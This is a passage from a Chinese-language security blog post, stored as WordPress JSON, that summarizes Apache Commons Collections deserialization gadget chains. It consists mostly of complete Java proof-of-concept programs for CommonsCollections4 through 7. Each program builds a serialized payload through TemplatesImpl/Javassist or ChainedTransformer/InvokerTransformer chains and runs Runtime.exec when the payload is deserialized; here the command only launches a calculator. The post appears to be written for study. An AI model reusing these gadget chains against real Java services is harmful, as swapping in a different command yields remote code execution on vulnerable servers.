import javassist.ClassClassPath;\nimport javassist.ClassPool;\nimport javassist.CtClass;\nimport org.apache.commons.collections4.Transformer;\nimport org.apache.commons.collections4.functors.ConstantTransformer;\nimport org.apache.commons.collections4.functors.InstantiateTransformer;\nimport org.apache.commons.collections4.comparators.TransformingComparator;\nimport org.apache.commons.collections4.functors.ChainedTransformer;\n\nimport javax.xml.transform.Templates;\n\nimport java.io.FileInputStream;\nimport java.io.FileOutputStream;\nimport java.io.ObjectInputStream;\nimport java.io.ObjectOutputStream;\nimport java.lang.reflect.Field;\nimport java.util.PriorityQueue;\n\npublic class CommonsCollections4 {\n public static class Placeholder {\n }\n\n public static void main(String[] args) throws Exception {\n String AbstractTranslet = \"com.sun.org.apache.xalan.internal.xsltc.runtime.AbstractTranslet\";\n String TemplatesImpl = \"com.sun.org.apache.xalan.internal.xsltc.trax.TemplatesImpl\";\n String TrAXFilter = \"com.sun.org.apache.xalan.internal.xsltc.trax.TrAXFilter\";\n \n \/*\u7b2c\u4e00\u6b65 \u51c6\u5907\u75c5\u6bd2*\/\n ClassPool classPool = ClassPool.getDefault();\n classPool.insertClassPath(new ClassClassPath(Placeholder.class));\n classPool.insertClassPath(new ClassClassPath(Class.forName(AbstractTranslet)));\n\n CtClass placeholder = classPool.get(Placeholder.class.getName());\n placeholder.setSuperclass(classPool.get(Class.forName(AbstractTranslet).getName()));\n placeholder.makeClassInitializer().insertBefore(\"java.lang.Runtime.getRuntime().exec(\\\"gnome-calculator\\\");\");\n placeholder.setName(\"demo.rmb122.\" + System.currentTimeMillis());\n\n byte[] bytecode = placeholder.toBytecode();\n \n \/*\u7b2c\u4e8c\u6b65 \u5bfb\u627e\u53d7\u4f53*\/\n Object templates = Class.forName(TemplatesImpl).getConstructor(new Class[]{}).newInstance();\n \/\/ \u4fee\u6539templates\u7684_bytecodes\u53d8\u91cf\n Field fieldByteCodes = templates.getClass().getDeclaredField(\"_bytecodes\");\n fieldByteCodes.setAccessible(true);\n fieldByteCodes.set(templates, new byte[][]{bytecode});\n \/\/ \u4fee\u6539templates\u7684_name\u53d8\u91cf\n Field fieldName = templates.getClass().getDeclaredField(\"_name\");\n fieldName.setAccessible(true);\n fieldName.set(templates, \"rmb122\");\n \n \/*\u7b2c\u4e09\u6b65 \u75c5\u6bd2\u586b\u5145\u5230\u5bbf\u4e3b\u3002*\/\n \/* \u8fd9\u4e00\u6b65\u628a\u4e09\u6b65\u53c8\u8d70\u4e86\u4e00\u904d *\/\n \/*3.1 \u51c6\u5907*\/\n Transformer[] transformers = new Transformer[]{\n new ConstantTransformer(Class.forName(TrAXFilter)),\n new InstantiateTransformer(new Class[]{Templates.class}, new Object[]{templates}),\n };\n\n ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);\n \n \/*3.2 *\/\n TransformingComparator comparator = new TransformingComparator(chainedTransformer);\n PriorityQueue queue = new PriorityQueue(2);\n queue.add(1);\n queue.add(1);\n \n \/*3.3 *\/\n Field field = PriorityQueue.class.getDeclaredField(\"queue\");\n field.setAccessible(true);\n Object[] innerArr = (Object[]) field.get(queue);\n innerArr[0] = templates;\n innerArr[1] = templates;\n\n field = PriorityQueue.class.getDeclaredField(\"comparator\");\n field.setAccessible(true);\n field.set(queue, comparator);\n\n ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(System.getProperty(\"user.dir\") + \"\/resources\/CommonCollections4.ser\"));\n oos.writeObject(queue);\n oos.close();\n \n FileInputStream fis = new FileInputStream(System.getProperty(\"user.dir\") + \"\/resources\/CommonCollections4.ser\");\n ObjectInputStream ois = new ObjectInputStream(fis);\n Object newObj = ois.readObject();\n ois.close();\n }\n}<\/code><\/pre>\n\n\n\n\u548cCommonsCollections3\u7684\u601d\u8def\u4e00\u6a21\u4e00\u6837\uff0c\u5c31\u662f\u6280\u672f\u7ec6\u8282\u7565\u6709\u4e0d\u540c\uff0c\u5bbf\u4e3b\u7531AnnotationInvocationHandler\u6362\u6210\u4e86PriorityQueue\u3002<\/p>\n\n\n\n
CommonsCollections5.java<\/p>\n\n\n\n
import java.io.FileInputStream;\nimport java.io.FileOutputStream;\nimport java.io.ObjectInputStream;\nimport java.io.ObjectOutputStream;\nimport java.lang.reflect.Field;\nimport java.util.HashMap;\nimport java.util.Map;\n\nimport javax.management.BadAttributeValueExpException;\n\nimport org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InvokerTransformer;\nimport org.apache.commons.collections.keyvalue.TiedMapEntry;\nimport org.apache.commons.collections.map.LazyMap;\n\npublic class CommonsCollections5 {\n\t\/\/JDK8\n public static void main(String[] args) throws Exception {\n \t\n \t\/*\u7b2c\u4e00\u6b65 \u51c6\u5907\u75c5\u6bd2*\/\n Transformer[] transformers = new Transformer[]{\n new ConstantTransformer(java.lang.Runtime.class),\n new InvokerTransformer(\"getMethod\", new Class[]{String.class, Class[].class}, new Object[]{\"getRuntime\", new Class[]{}}),\n new InvokerTransformer(\"invoke\", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{}}),\n new InvokerTransformer(\"exec\", new Class[]{String[].class}, new Object[]{new String[]{\"gnome-calculator\"}}),\n };\n\n ChainedTransformer chainedTransformer = new ChainedTransformer(transformers);\n\n \/*\u7b2c\u4e8c\u6b65 \u5bfb\u627e\u53d7\u4f53*\/\n HashMap<String, String> hashMap = new HashMap<String, String>();\n Map<?, ?> lazyMap = LazyMap.decorate(hashMap, chainedTransformer);\n TiedMapEntry tiedMapEntry = new TiedMapEntry(lazyMap, \"placeholder\");\n \n \/*\u7b2c\u4e09\u6b65 \u75c5\u6bd2\u586b\u5145\u5230\u5bbf\u4e3b\u3002*\/\n BadAttributeValueExpException badAttributeValueExpException = new BadAttributeValueExpException(\"placeholder\");\n Field field = badAttributeValueExpException.getClass().getDeclaredField(\"val\");\n field.setAccessible(true);\n \/\/ invoke method should have parameter and return value, tiedMapEntry is parameter ,badAttributeValueExpException is return value.\n field.set(badAttributeValueExpException, tiedMapEntry);\n\n ObjectOutputStream oos = new ObjectOutputStream(new FileOutputStream(System.getProperty(\"user.dir\") + \"\/resources\/CommonCollections5.ser\"));\n oos.writeObject(badAttributeValueExpException);\n oos.close();\n \n ObjectInputStream ois = new ObjectInputStream(new FileInputStream(System.getProperty(\"user.dir\") + \"\/resources\/CommonCollections5.ser\"));\n ois.readObject();\n ois.close();\n }\n}<\/code><\/pre>\n\n\n\n\u53ef\u4ee5\u770b\u5230\uff0c\u516c\u5f0f\u5e26\u8fdb\u53bb\uff0c\u53d8\u7684\u53ea\u6709\u5bbf\u4e3b(BadAttributeValueExpException)\u3002<\/p>\n\n\n\n
CommonsCollections6.java<\/p>\n\n\n\n
import org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InvokerTransformer;\nimport org.apache.commons.collections.keyvalue.TiedMapEntry;\nimport org.apache.commons.collections.map.LazyMap;\n\nimport com.nqzero.permit.Permit;\n\nimport java.io.FileInputStream;\nimport java.io.FileOutputStream;\nimport java.io.ObjectInputStream;\nimport java.io.ObjectOutputStream;\nimport java.lang.reflect.Field;\nimport java.util.HashMap;\nimport java.util.HashSet;\nimport java.util.Map;\n\npublic class CommonsCollections6 {\n\tpublic static void main(String[] args) throws Exception {\n\t\t\n\t\t\/*\u7b2c\u4e00\u6b65 \u51c6\u5907\u75c5\u6bd2*\/\n String command = \"gnome-calculator\";\n final String[] execArgs = new String[] { command };\n final Transformer[] transformers = new Transformer[] {\n new ConstantTransformer(Runtime.class),\n new InvokerTransformer(\"getMethod\", new Class[] {\n String.class, Class[].class }, new Object[] {\n \"getRuntime\", new Class[0] }),\n new InvokerTransformer(\"invoke\", new Class[] {\n Object.class, Object[].class }, new Object[] {\n null, new Object[0] }),\n new InvokerTransformer(\"exec\",\n new Class[] { String.class }, execArgs),\n new ConstantTransformer(1) };\n \n Transformer transformerChain = new ChainedTransformer(transformers);\n \n \/*\u7b2c\u4e8c\u6b65 \u5bfb\u627e\u53d7\u4f53*\/\n final Map innerMap = new HashMap();\n \/\/\u521b\u5efa\u4e00\u4e2afactory\u4e3a\u6076\u610fChainedTransformer\u5bf9\u8c61\u7684lazyMap\u7c7b\u5b9e\u4f8b\n final Map lazyMap = LazyMap.decorate(innerMap, transformerChain);\n \n \/\/\u521b\u5efa\u4e00\u4e2amap\u4e3a\u6076\u610flazyMap\u7c7b\u5b9e\u4f8b\uff0ckey\u4e3afoo\u7684TiedMapEntry\u7c7b\u5b9e\u4f8b\n TiedMapEntry entry = new TiedMapEntry(lazyMap, \"foo\");\n \n \/*\u7b2c\u4e09\u6b65 \u53d7\u4f53\u586b\u5145\u5230\u5bbf\u4e3b\u3002*\/\n HashSet map = new HashSet(1);\n map.add(\"foo\");\n \n Field f = null;\n try {\n f = HashSet.class.getDeclaredField(\"map\");\n } catch (NoSuchFieldException e) {\n f = HashSet.class.getDeclaredField(\"backingMap\");\n }\n \/\/\u53d6\u51faHashSet\u5bf9\u8c61\u7684\u6210\u5458\u53d8\u91cfmap\n Permit.setAccessible(f);\n HashMap innimpl = (HashMap) f.get(map);\n Field f2 = null;\n try {\n f2 = HashMap.class.getDeclaredField(\"table\");\n } catch (NoSuchFieldException e) {\n f2 = HashMap.class.getDeclaredField(\"elementData\");\n }\n \/\/\u53d6\u51faHashMap\u5bf9\u8c61\u7684\u6210\u5458\u53d8\u91cftable\n Permit.setAccessible(f2);\n Object[] array = (Object[]) f2.get(innimpl);\n \/\/\u53d6\u51fatable\u91cc\u9762\u7684\u7b2c\u4e00\u4e2aEntry\n Object node = array[0];\n if(node == null){\n node = array[1];\n }\n Field keyField = null;\n try{\n keyField = node.getClass().getDeclaredField(\"key\");\n }catch(Exception e){\n keyField = Class.forName(\"java.util.MapEntry\").getDeclaredField(\"key\");\n }\n \/\/\u53d6\u51faEntry\u5bf9\u8c61\u91cd\u7684key\uff0c\u5e76\u5c06\u5b83\u8d4b\u503c\u4e3a\u6076\u610f\u7684TiedMapEntry\u5bf9\u8c61\n Permit.setAccessible(keyField);\n keyField.set(node, entry);\n \n FileOutputStream fos = new FileOutputStream(System.getProperty(\"user.dir\") + \"\/resources\/CommonCollections6.ser\");\n ObjectOutputStream oos = new ObjectOutputStream(fos);\n oos.writeObject(map);\n oos.flush();\n oos.close();\n FileInputStream fis = new FileInputStream(System.getProperty(\"user.dir\") + \"\/resources\/CommonCollections6.ser\");\n ObjectInputStream ois = new ObjectInputStream(fis);\n Object newObj = ois.readObject();\n ois.close();\n }\n}<\/code><\/pre>\n\n\n\n\u4e07\u53d8\u4e0d\u79bb\u5176\u4e2d\uff0c\u4e2d\u5b66\u6570\u5b66\u8001\u5e08\u5e38\u8bf4\u7684\u8bdd\u3002\u5373\u4f7fPOC\u4e0d\u592a\u4e00\u6837\uff0c\u6700\u540e\u601d\u8def\u8fd8\u662f\u4e00\u6a21\u4e00\u6837\uff0cLazyMap\u88ab\u5305\u88f9\u5728\u4e86TiedMapEntry\u91cc\uff0c\u6700\u540e\u88ab\u53cd\u5c04\u5230\u5bbf\u4e3b(HashSet)\u8eab\u4e0a\u3002<\/p>\n\n\n\n
CommonsCollections7.java<\/p>\n\n\n\n
import org.apache.commons.collections.Transformer;\nimport org.apache.commons.collections.functors.ChainedTransformer;\nimport org.apache.commons.collections.functors.ConstantTransformer;\nimport org.apache.commons.collections.functors.InvokerTransformer;\nimport org.apache.commons.collections.map.LazyMap;\n\nimport java.io.FileInputStream;\nimport java.io.FileOutputStream;\nimport java.io.ObjectInputStream;\nimport java.io.ObjectOutputStream;\nimport java.lang.reflect.Field;\nimport java.util.HashMap;\n\npublic class CommonsCollections7 {\n public static void main(String[] args) throws Exception {\n \t\n \t\/*\u7b2c\u4e00\u6b65 \u51c6\u5907\u75c5\u6bd2*\/\n Transformer[] transformers = new Transformer[]{\n new ConstantTransformer(java.lang.Runtime.class),\n new InvokerTransformer(\"getMethod\", new Class[]{String.class, Class[].class}, new Object[]{\"getRuntime\", new Class[]{}}),\n new InvokerTransformer(\"invoke\", new Class[]{Object.class, Object[].class}, new Object[]{null, new Object[]{}}),\n new InvokerTransformer(\"exec\", new Class[]{String[].class}, new Object[]{new String[]{\"gnome-calculator\"}}),\n };\n \n \/*\u7b2c\u4e8c\u6b65 \u5bfb\u627e\u53d7\u4f53*\/\n Transformer[] fake = new Transformer[]{\n new ConstantTransformer(\"placeholder\"),\n };\n ChainedTransformer chainedTransformer = new ChainedTransformer(fake);\n \n HashMap innerMap1 = new HashMap<String, String>();\n innerMap1.put(\"yy\", \"1\"); \/\/ \"yy\".hashCode() == \"zZ\".hashCode() == 3872\n HashMap innerMap2 = new HashMap<String, String>();\n innerMap2.put(\"zZ\", \"1\");\n\n LazyMap lazyMap1 = (LazyMap) LazyMap.decorate(innerMap1, chainedTransformer);\n LazyMap lazyMap2 = (LazyMap) LazyMap.decorate(innerMap2, chainedTransformer);\n \n \/*\u7b2c\u4e09\u6b65 \u75c5\u6bd2\u586b\u5145\u5230\u5bbf\u4e3b\u3002*\/\n HashMap hashMap = new HashMap();\n hashMap.put(lazyMap1, \"placeholder\");\n hashMap.put(lazyMap2, \"placeholder\");\n\n \/\/ \u5728 put \u7684\u65f6\u5019\u4ea7\u751f\u78b0\u649e, \u6839\u636e\u4e0a\u9762\u7684\u5206\u6790\u8c03\u7528 LazyMap.get, LazyMap \u4f1a\u5c06\u7ed3\u679c\u5b58\u5165 innerMap \u4e2d\u7f13\u5b58, \u6240\u4ee5\u8fd9\u91cc\u9700\u8981\u5c06\u5176\u6e05\u9664, \u5426\u5219 hashcode \u5c31\u4e0d\u4e00\u6837\u4e86 \n \/\/ \u6e05\u9664 hash code\n innerMap1.remove(\"zZ\"); \n\n \/\/ \u540c\u4e0a, \u5c06\u771f\u6b63\u7684 transformers \u8bbe\u7f6e, \u4e0d\u7136\u5728\u751f\u6210 exp \u65f6\u5c31\u4f1a\u6267\u884c\u547d\u4ee4, \u81ea\u5df1\u6253\u81ea\u5df1\u4e86\n Field field = chainedTransformer.getClass().getDeclaredField(\"iTransformers\"); \n field.setAccessible(true);\n field.set(chainedTransformer, transformers);\n\n FileOutputStream fos = new FileOutputStream(System.getProperty(\"user.dir\") + \"\/resources\/CommonCollections7.ser\");\n ObjectOutputStream oos = new ObjectOutputStream(fos);\n oos.writeObject(hashMap);\n oos.flush();\n oos.close();\n FileInputStream fis = new FileInputStream(System.getProperty(\"user.dir\") + \"\/resources\/CommonCollections7.ser\");\n ObjectInputStream ois = new ObjectInputStream(fis);\n Object newObj = ois.readObject();\n ois.close();\n }\n}\n<\/code><\/pre>\n\n\n\n\u548c\u4e4b\u524d6\u4e2a\u53c8\u4e0d\u592a\u4e00\u6837\uff0c\u75c5\u6bd2\u662f\u5728\u6700\u540e\u53cd\u5c04\u9636\u6bb5\uff0c\u5bbf\u4e3b\u90fd\u5df2\u7ecf\u6784\u5efa\u5b8c\u6210\u4e86\uff0c\u518d\u53cd\u5c04\u8fdb\u5bbf\u4e3b\u7684\u5668\u5b98\u5f53\u4e2d\u3002\u4e09\u6b65\u8d70\u7684\u601d\u8def\u8fd8\u662f\u9002\u7528\u7684\u3002<\/p>\n\n\n\n
\u52e4\u6d17\u624b\u53ef\u4ee5\u9884\u9632\u75c5\u6bd2\u3002<\/p>\n\n\n\n
\u53c2\u8003\uff1a
\u539f\u7406
https:\/\/paper.seebug.org\/792\/ <\/a>
https:\/\/badcode.cc\/2018\/03\/15\/Java%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96%E4%B9%8BCommons-Collections\/<\/a>
https:\/\/mp.weixin.qq.com\/s\/XSv3GNkj-23JKl6ccUjxRQ<\/a>
POC
https:\/\/xz.aliyun.com\/t\/7157<\/a>
https:\/\/www.freebuf.com\/articles\/web\/214096.html<\/a><\/p>\n\n\n\n<\/p>\n","protected":false},"excerpt":{"rendered":"
\u672c\u6587\u4e3b\u8981\u662f\u5bf9Apache CommonsCollections\u7cfb\u5217\u7684\u5229\u7528\u65b9\u6cd5\u8fdb\u884c\u4e86\u603b\u7ed3\u3002\u7531\u4e8e\u7f51\u4e0a\u5df2\u7ecf\u6709\u592a\u591a\u7684\u5206\u6790\u6587\u7ae0\uff0c\u6545\u672a\u5bf9\u6280\u672f\u539f\u7406\u505a\u8f83\u6df1\u5165\u7684\u5206\u6790\uff0c\u4ec5\u4ec5\u662f\u4ee5\u603b\u7ed3\u65b9\u6cd5\u4e3a\u76ee\u7684\u3002Apache CommonCollections1-7\u7684\u5229\u7528\u65b9\u6cd5\u603b\u7ed3\u5982\u4e0b\uff1a \u7b2c\u4e00\u6b65 \u51c6\u5907\u75c5\u6bd2 \u7b2c\u4e8c\u6b65 \u5bfb\u627e\u53d7\u4f53 \u7b2c\u4e09\u6b65 \u75c5\u6bd2\u586b\u5145\u5230\u5bbf\u4e3b \u5173\u4e8e\u7b2c\u4e00\u6b65\uff0c\u4e3b\u8981\u6709\u4e24\u79cd\u65b9\u6cd5\uff1a ChainedTransformer \u6784\u9020 javassist\u52a8\u6001\u7f16\u7a0b\u751f\u6210\u4e00\u4e2a\u6267\u884c\u547d\u4ee4\u7684\u7c7b\u3002\u8f6c\u5316\u6210byte[]\u7c7b\u578b\uff0c\u586b\u5145\u5230\u67d0\u4e9b\u7c7b(TemplatesImpl)\u4e2d\u7684\u201c_bytecodes\u201d\u53d8\u91cf\u91cc \u5173\u4e8e\u7b2c\u4e8c\u6b65\uff0c\u4e3b\u8981\u6709\u4e24\u79cd\u65b9\u6cd5\uff1a \u4e09\u5927Map:LazyMap,TiedMapEntry,HashMap \uff0c\u5bf9\u5e94\u7b2c\u4e00\u6b65\u7684\u7b2c\u4e00\u79cd\u65b9\u6cd5\u3002 TemplatesImpl\u7c7b\u79cd\u7684_bytecodes\u53ef\u88ab\u586b\u5145\u6076\u610f\u7c7b\u3002\u5bf9\u5e94\u7b2c\u4e00\u6b65\u7684\u7b2c\u4e8c\u79cd\u65b9\u6cd5\u3002 \u5173\u4e8e\u7b2c\u4e09\u6b65\uff0c\u5c31\u662f\u7528\u53cd\u5c04\u628a\u75c5\u6bd2\u586b\u5145\u5230vulnerable\u7684\u7c7b\u4e2d\uff0creadObject\u7684\u65f6\u5019\u89e6\u53d1\u75c5\u6bd2\u3002 \u4e0b\u9762\u7b80\u5355\u4e86\u89e3\u4e00\u4e0b\u7b2c\u4e00\u6b65\u7684\u539f\u7406\u3002 \u901a\u8fc7ChainedTransformer \u6784\u9020\u75c5\u6bd2\u7684demo: \u6700\u7ec8 transform() \u65b9\u6cd5 \u4f1a\u5728Gnome\u684c\u9762\u73af\u5883\u4e0b\u7684kali\u4e2d\u5f39\u51fa\u8ba1\u7b97\u5668\u3002 \u5173\u4e8e\u4e3a\u4ec0\u4e48\u8981\u7528ChainedTransformer\uff0c\u5f15\u7528\u300a\u6d45\u6790 Java \u5e8f\u5217\u5316\u548c\u53cd\u5e8f\u5217\u5316\u300b(\u5f53\u4e2d\u7684\u8bf4\u6cd5\u662f\u201c\u901a\u8fc7\u53cd\u5c04\u6280\u672f\u83b7\u53d6\u5bf9\u8c61\u8c03\u7528\u51fd\u6570\u90fd\u4f1a\u5b58\u5728\u4e00\u4e2a\u4e0a\u4e0b\u6587\u73af\u5883\uff0c\u4f7f\u7528\u94fe\u5f0f\u7ed3\u6784\u7684\u8bed\u53e5\u53ef\u4ee5\u4fdd\u8bc1\u6267\u884c\u8fc7\u7a0b\u4e2d\u8fd9\u4e2a\u4e0a\u4e0b\u6587\u662f\u4e00\u81f4\u7684\u3002\u201d \u901a\u8fc7javassist\u52a8\u6001\u7f16\u7a0b\u751f\u6210\u4e00\u4e2a\u6267\u884c\u547d\u4ee4\u7684\u7c7b\u7684demo: \u901a\u8fc7\u4e00\u4e2ademo\u7406\u89e3\u7b2c\u4e8c\u6b65\u7684\u53d7\u4f53\u662f\u5e72\u561b\u7684 \u5728entry.setValue(“123”);\u5904\u4e0b\u65ad\u70b9\uff0c\u53ef\u4ee5\u770b\u5230\uff0c\u5f53\u6076\u610f\u7684chainedTransformer\u901a\u8fc7decorate()\u65b9\u6cd5\u586b\u5165Map\u5bf9\u8c61\u540e\uff0c\u5728\u8fdb\u884cMap\u7684setValue\u64cd\u4f5c\u65f6\uff0c\u4f1a\u89e6\u53d1transform()\u65b9\u6cd5\uff0c\u89e6\u53d1\u4ee3\u7801\u6267\u884c\u3002 \u4f46\u662f\u53d7\u4f53\u7684setValue()\u65b9\u6cd5\u4e5f\u662f\u9700\u8981\u89e6\u53d1\u7684\uff0c\u56e0\u6b64\u9700\u8981\u4e00\u4e2a\u53ef\u4ee5\u901a\u8fc7readObject()\u89e6\u53d1\u75c5\u6bd2\u7684\u5bbf\u4e3b\u3002 \u7531\u4e8eCommonsCollections 1-7\u601d\u8def\u90fd\u5dee\u4e0d\u591a\uff0c\u90fd\u53ef\u4ee5\u5957\u516c\u5f0f\uff08\u4e09\u6b65\u8d70\uff09\uff0c\u6240\u4ee5\u53ea\u5206\u6790CommonsCollections1\uff0c\u5176\u4ed6\u7684 \u7528\u4e0a\u9762\u63d0\u5230\u7684\u65b9\u6cd5\u8fc7\u4e00\u4e0b\u3002\u4e0b\u9762\u770b\u5177\u4f53\u4ee3\u7801\u3002CommonsCollections1.java \u5728 ois.readObject(); \u5904\u4e0b\u65ad\u70b9\u3002Object obj = readObject0(false); \u8ddf\u8fdb TC_OBJECT\u6761\u4ef6\u8ddf\u8fdb\uff1a readSerialData(obj, desc);\u8ddf\u8fdb \u5728\u8fd9\u4e2a\u65b9\u6cd5\u91cc\u5c31\u662f\u904d\u5386\u5904\u7406Object\u5bf9\u8c61slotDesc.invokeReadObject(obj, this); \u8ddf\u8fdb\uff0c\u5176\u4ed6\u53ef\u4ee5\u4e00\u8defF6 \u76f4\u5230\u8fdb\u5165\u6211\u4eec\u7684\u4e3b\u89d2\uff0c\u5bbf\u4e3bAnnotationInvocationHandler \u679c\u7136\u5728readObject\u4e2d\u6709\u5bf9Map\u5bf9\u8c61\u7684\u64cd\u4f5c\u3002\u5f53\u8fdb\u5165AnnotationInvocationHandler\u7684invoke\u65b9\u6cd5\uff0c\u8ddf\u8fdbObject var6 = this.memberValues.get(var4);\u55ef\uff0c\u7136\u540e\u5c31\u662f\u89e6\u53d1\u75c5\u6bd2\u7684transform()\u4e86\u3002 \u56fe\u4e2d iTransformers […]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[5,2],"tags":[],"_links":{"self":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/334"}],"collection":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=334"}],"version-history":[{"count":5,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/334\/revisions"}],"predecessor-version":[{"id":353,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=\/wp\/v2\/posts\/334\/revisions\/353"}],"wp:attachment":[{"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=334"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=334"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/blog.73007300.xyz\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=334"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}